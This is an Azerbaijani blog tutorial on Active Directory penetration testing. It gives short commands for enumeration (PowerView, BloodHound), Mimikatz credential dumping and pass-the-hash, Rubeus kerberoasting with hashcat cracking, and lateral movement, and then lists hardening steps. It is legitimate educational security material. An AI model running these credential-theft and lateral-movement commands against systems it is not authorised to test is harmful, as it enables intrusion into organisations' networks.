Active Directory Pentesti: Təhlükəsizlik və Hücum Metodları

1. Active Directory Nədir?

Active Directory (AD) Microsoft-un şəbəkə mühitində identifikasiya, autentifikasiya və avtorizasiya xidmətlərini idarə etmək üçün yaratdığı bir texnologiyadır. AD əsasən böyük təşkilatlarda istifadə olunur və istifadəçi hesablarını, kompüterləri, qrupları və digər resursları bir mərkəzdən idarə etməyə imkan verir.

Əsas komponentlər:

  • Domain Controller (DC) – AD-nin əsas serveri, istifadəçi məlumatlarını və təhlükəsizlik siyasətlərini saxlayır.
  • Kerberos Authentication – AD daxilində autentifikasiya üçün istifadə olunan protokol.
  • LDAP (Lightweight Directory Access Protocol) – Məlumat bazasına giriş üçün istifadə edilən protokol.
  • Group Policy Objects (GPO) – İstifadəçi və cihaz siyasətlərini idarə edir.

2. Active Directory Pentesti Üçün Əsas Hücumlar

Active Directory infrastrukturu müxtəlif hücum vektorlarına qarşı həssasdır. Burada əsas hücum metodlarını və onların istismar üsullarını izah edirik.

2.1. Domain Enumeration (Məlumat Toplama)

PowerViewBloodHound kimi alətlər AD infrastrukturu haqqında məlumat toplamaq üçün istifadə olunur.

PowerView ilə Domain Enumeration

# Domain istifadəçilərini əldə etmək
Get-NetUser

# Domain qruplarını yoxlamaq
Get-NetGroup

# Domain controller-ları əldə etmək
Get-NetDomainController

BloodHound ilə Domain Enumeration

neo4j console &  # BloodHound üçün Neo4j bazasını işə salırıq
bloodhound &  # BloodHound interfeysini açırıq

BloodHound, şəbəkədəki zəiflikləri vizuallaşdırmağa və istismar yollarını müəyyən etməyə imkan verir.


2.2. Pass-the-Hash (PtH) Hücumu

Hesabın şifrəsini bilmədən NTLM hash-lə autentifikasiya olunmağa imkan verir.

Mimikatz ilə Pass-the-Hash

mimikatz
sekurlsa::logonpasswords
sekurlsa::pth /user:Administrator /domain:example.local /ntlm:<NTLM Hash>

Bununla, NTLM hash istifadə edərək autentifikasiya olunmaq mümkündür.


2.3. Kerberoasting Hücumu

Kerberoasting, AD-də xidmət hesablarının zəif şifrələnmiş biletlərini əldə edib qırmağa çalışmaq üçün istifadə olunur.

Rubeus ilə Kerberoasting

Rubeus.exe kerberoast /nowrap

Elde edilen şifrəli məlumatlar Hashcat ilə qırıla bilər:

hashcat -m 13100 -a 0 hash.txt wordlist.txt

2.4. Lateral Movement (Yatay Hərəkət)

Hücumçular bir maşından digərinə keçmək üçün “Lateral Movement” metodlarından istifadə edirlər.

PsExec ilə Yatay Hərəkət

Invoke-Command -ComputerName "target-PC" -Credential $cred -ScriptBlock { whoami }

RDP ilə Yatay Hərəkət

xfreerdp /u:user /p:password /v:target-IP

3. Active Directory Təhlükəsizliyinin Gücləndirilməsi

3.1. İstifadəçi Hüquqlarının Minimuma Endirilməsi

  • Administrator hesablarından gündəlik istifadəni məhdudlaşdırmaq.
  • Lazımsız domain administratorlarını silmək.

3.2. NTLM və LM Hash-lərin Saxlanılmasının Qarşısının Alınması

Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name 'NoLMHash' -Value 1

3.3. Kerberos Konfiqurasiyasını Gücləndirmək

  • Güclü şifrə siyasətlərini tətbiq etmək.
  • Kerberos biletlərinin müddətini məhdudlaşdırmaq.
Set-ADDefaultDomainPasswordPolicy -Identity "example.local" -MaxPasswordAge 30

4. Nəticə

Active Directory pentesti böyük təşkilatların təhlükəsizlik zəifliklərini aşkar etmək və qoruma tədbirləri görmək üçün vacibdir. Bu məqalədə AD hücum metodlarını və onların qarşısını alma yollarını izah etdik. AD-nin təhlükəsizliyini gücləndirmək üçün müntəzəm auditlər və düzgün konfiqurasiyalar tətbiq edilməlidir.

Bir cavab yazın

Sizin e-poçt ünvanınız dərc edilməyəcəkdir. Gərəkli sahələr * ilə işarələnmişdir